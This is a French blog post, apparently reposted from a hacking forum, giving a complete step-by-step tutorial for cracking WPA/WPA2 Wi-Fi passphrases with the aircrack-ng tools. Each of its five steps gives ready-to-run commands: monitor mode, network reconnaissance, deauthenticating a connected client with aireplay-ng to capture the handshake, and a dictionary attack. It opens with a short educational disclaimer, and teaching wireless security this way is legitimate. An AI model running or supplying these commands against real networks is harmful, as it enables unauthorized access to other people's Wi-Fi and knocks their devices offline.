vendredi 1 avril 2016

[Crack the WPA/WPA2 passphrase]

Ce tutoriel s'inscrit dans une optique pédagogique et présente un des vecteurs possible d'attaque sur les réseaux wifi sécurisés avec la technologie WPA/WPA2(Wireless Protectect Access), il inclut la déconnexion de station sur le réseau et peut perturber l'activité de celui-ci, testez cette attaque sur votre matériel ou avec des personnes qui vous ont données l'autorisation.

Prérequis :
  • Une carte compatible avec le mode "moniteur" et capable d'injecter des paquets sur le réseau.
  • Un point d'accès wifi sécurisé avec la technologie WPA/WPA2.
  • Un client authentifié sur le point d'accès.
  • Un dictionnaire qui servira à bruteforce la clé.


Le but de cette attaque est de capturer le 4-way handshake réalisé lors de l'authentification d'un client sur le WLAN(Wide Local Area network).Pour ce faire, nous devons déauthentifier une station présente sur le réseau.

L'image qui suit décrit le contexte de l'attaque :

atkwifi.jpg


L'attaque se déroulera en cinq étapes :
  1. Créer une interface en mode "moniteur".
  2. Récupérer les informations sur le réseau à attaquer.
  3. Configurer notre carte réseau sur la même channel que le réseau wifi ciblé.
  4. Déauthentifier une station et récupérer le 4-way handshake.
  5. Lancer l'attaque par dictionnaire sur la capture effectuée.





[1] - Créer une interface en mode "moniteur"



Pour créer une interface en mode "moniteur", vous avez le choix entre l'outil intégrer dans la suite aircrack-ng, airmon-ng, ou l'utilaire iw, l'équivalent de ifconfig mais dédié aux

cartes wifi :

Avec airmon-ng :

Code:

sudo airmon-ng start wlan0
wlan0 est le nom de votre interface wifi à passée en mode moniteur.

Avec iw:

Code:

sudo iw dev wlan0 interface add mon0 type monitor
wlan0 est le nom de votre interface wifi à passée en mode moniteur, et mon0 le nom de l'interface "moniteur" crée.

Si vous avez utilisé la deuxième méthode, vous devrez activé l'interface avec la commande :

Code:

sudo ifconfig mon0 up
mon0 est le nom de l'interface "moniteur" crée à activée.




[2] - Récupérer les informations sur le réseau à attaquer


Maintenant que notre interface est prête, nous allons écouter le réseau grâce à l'outil airodump-ng :

Code:

sudo airodump-ng mon0
mon0 est le nom de l'interface "moniteur" que vous avez crée.

Vous devriez tombé sur une fenêtre similaire à celle-ci :

rect4248.jpg

On y retrouve les points d'accés présent autour de vous ainsi que les stations et leurs états, localisez le point d'accès sur lequel vous voulez lancer l'attaque dans la colonne

ESSID, sur la ligne qui décrit les informations propre au point d'accès une colonne CH est présente, le numéro associé correspond à la channel sur lequel votre point

d'accès émet. Mémorisez ce numéro et copier dans le presse papier le BSSID(adresse MAC) lié à votre point d'accès.




[3] - Configurer notre carte réseau sur la même channel que le réseau wifi ciblé


Interrompez l’exécution d'airodump-ng(CTRL+C) et relancez le pour ne collecter que les données liées à notre point d'accès :

Code:

sudo airodump-ng --bssid 00:00:00:00:00:00 --channel 7 mon0
00:00:00:00:00:00 est l'adresse mac du point d'accès, et 7, la channel sur lequel il diffuse,mon0 le nom de l'interface "moniteur" que vous avez crée.

Lorsque le tool sera lancé, localisez votre station authentifiée sur le réseau et noter son adresse MAC.

L'adresse MAC de la station notée, vous pouvez quitter airodump-ng et changer la channel de votre carte réseau pour préparer

la déauthentification du client connecté :

Code:

sudo iwconfig wlan0 down
wlan0 est l'interface sur laquelle vous avez créé l'interface de type "moniteur".

Code:

sudo iwconfig wlan0 channel 7
wlan0 est l'interface sur laquelle vous avez créé l'interface de type "moniteur", et 7 la channel sur laquelle votre point d'accès émet.

Code:

sudo iwconfig wlan0 up
wlan0 est l'interface sur laquelle vous avez créé l'interface de type "moniteur".




[4] - Déauthentifier une station et récupérer le 4-way handshake


C'est l'étape clé de notre attaque, avant de déauthentifier le client, nous devons relancer airodump-ng pour capturer le 4-way handshake qui nous servira pour

l'attaque par dictionnaire :

Code:

sudo airodump-ng --bssid 00:00:00:00:00:00 --channel 7 --write WPAhandShake mon0
00:00:00:00:00:00 est l'adresse mac du point d'accès,7, la channel sur lequel il diffuse,WPAhandShake le nom du fichier dans lequel les paquets réseau

seront sauvegardés, et mon0 le nom de l'interface "moniteur" que vous avez crée.

Dans un autre terminal, vous pouvez maintenant lancer la déauthentification du client avec la commande suivante :

Code:

sudo aireplay-ng -0 20 -a 00:00:00:00:00:00 -c 00:00:00:00:00:0A mon0
20 est le nombre de déauthentification à envoyé, 00:00:00:00:00:00 , l'adresse MAC du point d'accès, 00:00:00:00:00:0A l'adresse MAC de la station connectée

au point d'accès, et mon0 le nom de l'interface "moniteur" que vous avez crée.

Si les trames ont bien été envoyés airodump-ng devrait vous notifiez qu'il a intercepter un handshake :

image4195.jpg

Vous avez maintenant tout entre vos mains pour lancer l'attaque par dictionnaire sur le fichier créer par airodump-ng précédemment.



[5] - Lancer l'attaque par dictionnaire sur la capture effectuée

Commande :

Code:

sudo aircrack-ng WPAhandShake -w /home/guest/dico.txt
WPAhandShake est le nom du fichier dans lequel les paquets réseau ont été sauvegardés, et /home/guest/dico.txt le chemin du dictionnaire à utiliser.


Soyez patient, mais n’espérez pas trouver la clé si elle n'était pas présente dans le dictionnaire ! ~
Images jointes


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1MHmBwH
via IFTTT

Aucun commentaire:

Enregistrer un commentaire